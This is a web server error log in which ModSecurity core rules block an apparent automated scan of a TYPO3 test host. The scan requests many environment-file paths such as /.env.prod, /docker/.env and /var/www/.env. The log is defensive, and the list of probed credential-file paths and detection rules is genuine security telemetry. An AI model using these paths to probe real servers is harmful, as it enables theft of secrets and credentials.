[Fri Mar 20 15:01:16.214670 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envrc"] [unique_id "ab1TLKx8_pxqReT7SyGPFgAAAAM"]
[Fri Mar 20 15:01:16.221740 2026] [authz_core:error] [pid 2815713] [client 162.158.86.142:13502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.production.bak
[Fri Mar 20 15:01:16.222779 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tQAAAAE"]
[Fri Mar 20 15:01:16.222876 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tQAAAAE"]
[Fri Mar 20 15:01:16.222984 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tQAAAAE"]
[Fri Mar 20 15:01:16.226195 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab1TLPy1_WiwY9KfWu_4wAAAAAI"]
[Fri Mar 20 15:01:16.226297 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab1TLPy1_WiwY9KfWu_4wAAAAAI"]
[Fri Mar 20 15:01:16.226436 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "ab1TLPy1_WiwY9KfWu_4wAAAAAI"]
[Fri Mar 20 15:01:16.234163 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab1TLKx8_pxqReT7SyGPFwAAAAM"]
[Fri Mar 20 15:01:16.234257 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab1TLKx8_pxqReT7SyGPFwAAAAM"]
[Fri Mar 20 15:01:16.234377 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab1TLKx8_pxqReT7SyGPFwAAAAM"]
[Fri Mar 20 15:01:16.238078 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "ab1TLEnH70iMTzyPh3kWjgAAAAY"]
[Fri Mar 20 15:01:16.238181 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "ab1TLEnH70iMTzyPh3kWjgAAAAY"]
[Fri Mar 20 15:01:16.238295 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "ab1TLEnH70iMTzyPh3kWjgAAAAY"]
[Fri Mar 20 15:01:16.242520 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.container"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.container"] [unique_id "ab1TLEGu3yPOFBRkxZtwxAAAAAA"]
[Fri Mar 20 15:01:16.242608 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.container"] [unique_id "ab1TLEGu3yPOFBRkxZtwxAAAAAA"]
[Fri Mar 20 15:01:16.242711 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.container"] [unique_id "ab1TLEGu3yPOFBRkxZtwxAAAAAA"]
[Fri Mar 20 15:01:16.246203 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tgAAAAE"]
[Fri Mar 20 15:01:16.246295 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tgAAAAE"]
[Fri Mar 20 15:01:16.246416 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1tgAAAAE"]
[Fri Mar 20 15:01:16.249822 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env.local"] [unique_id "ab1TLG8zubx8zfwe9oW5OAAAAAU"]
[Fri Mar 20 15:01:16.249915 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env.local"] [unique_id "ab1TLG8zubx8zfwe9oW5OAAAAAU"]
[Fri Mar 20 15:01:16.250025 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env.local"] [unique_id "ab1TLG8zubx8zfwe9oW5OAAAAAU"]
[Fri Mar 20 15:01:16.253580 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab1TLJJiwBXnNifSr5veqQAAAAQ"]
[Fri Mar 20 15:01:16.253683 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab1TLJJiwBXnNifSr5veqQAAAAQ"]
[Fri Mar 20 15:01:16.253794 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "ab1TLJJiwBXnNifSr5veqQAAAAQ"]
[Fri Mar 20 15:01:16.258095 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/.env"] [unique_id "ab1TLP9i5ZHhQgdGB68gHgAAAAg"]
[Fri Mar 20 15:01:16.258203 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/.env"] [unique_id "ab1TLP9i5ZHhQgdGB68gHgAAAAg"]
[Fri Mar 20 15:01:16.258323 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/srv/.env"] [unique_id "ab1TLP9i5ZHhQgdGB68gHgAAAAg"]
[Fri Mar 20 15:01:16.265487 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab1TLKx8_pxqReT7SyGPGAAAAAM"]
[Fri Mar 20 15:01:16.265588 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab1TLKx8_pxqReT7SyGPGAAAAAM"]
[Fri Mar 20 15:01:16.265705 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "ab1TLKx8_pxqReT7SyGPGAAAAAM"]
[Fri Mar 20 15:01:16.266310 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab1TLBq8pDZXKMuYECLOXAAAAAk"]
[Fri Mar 20 15:01:16.266427 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab1TLBq8pDZXKMuYECLOXAAAAAk"]
[Fri Mar 20 15:01:16.266557 2026] [:error] [pid 2817640] [client 162.158.86.254:13016] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "ab1TLBq8pDZXKMuYECLOXAAAAAk"]
[Fri Mar 20 15:01:16.269469 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1twAAAAE"]
[Fri Mar 20 15:01:16.269567 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1twAAAAE"]
[Fri Mar 20 15:01:16.269694 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1twAAAAE"]
[Fri Mar 20 15:01:16.277287 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwxQAAAAA"]
[Fri Mar 20 15:01:16.277387 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwxQAAAAA"]
[Fri Mar 20 15:01:16.277503 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/.env"] [unique_id "ab1TLEGu3yPOFBRkxZtwxQAAAAA"]
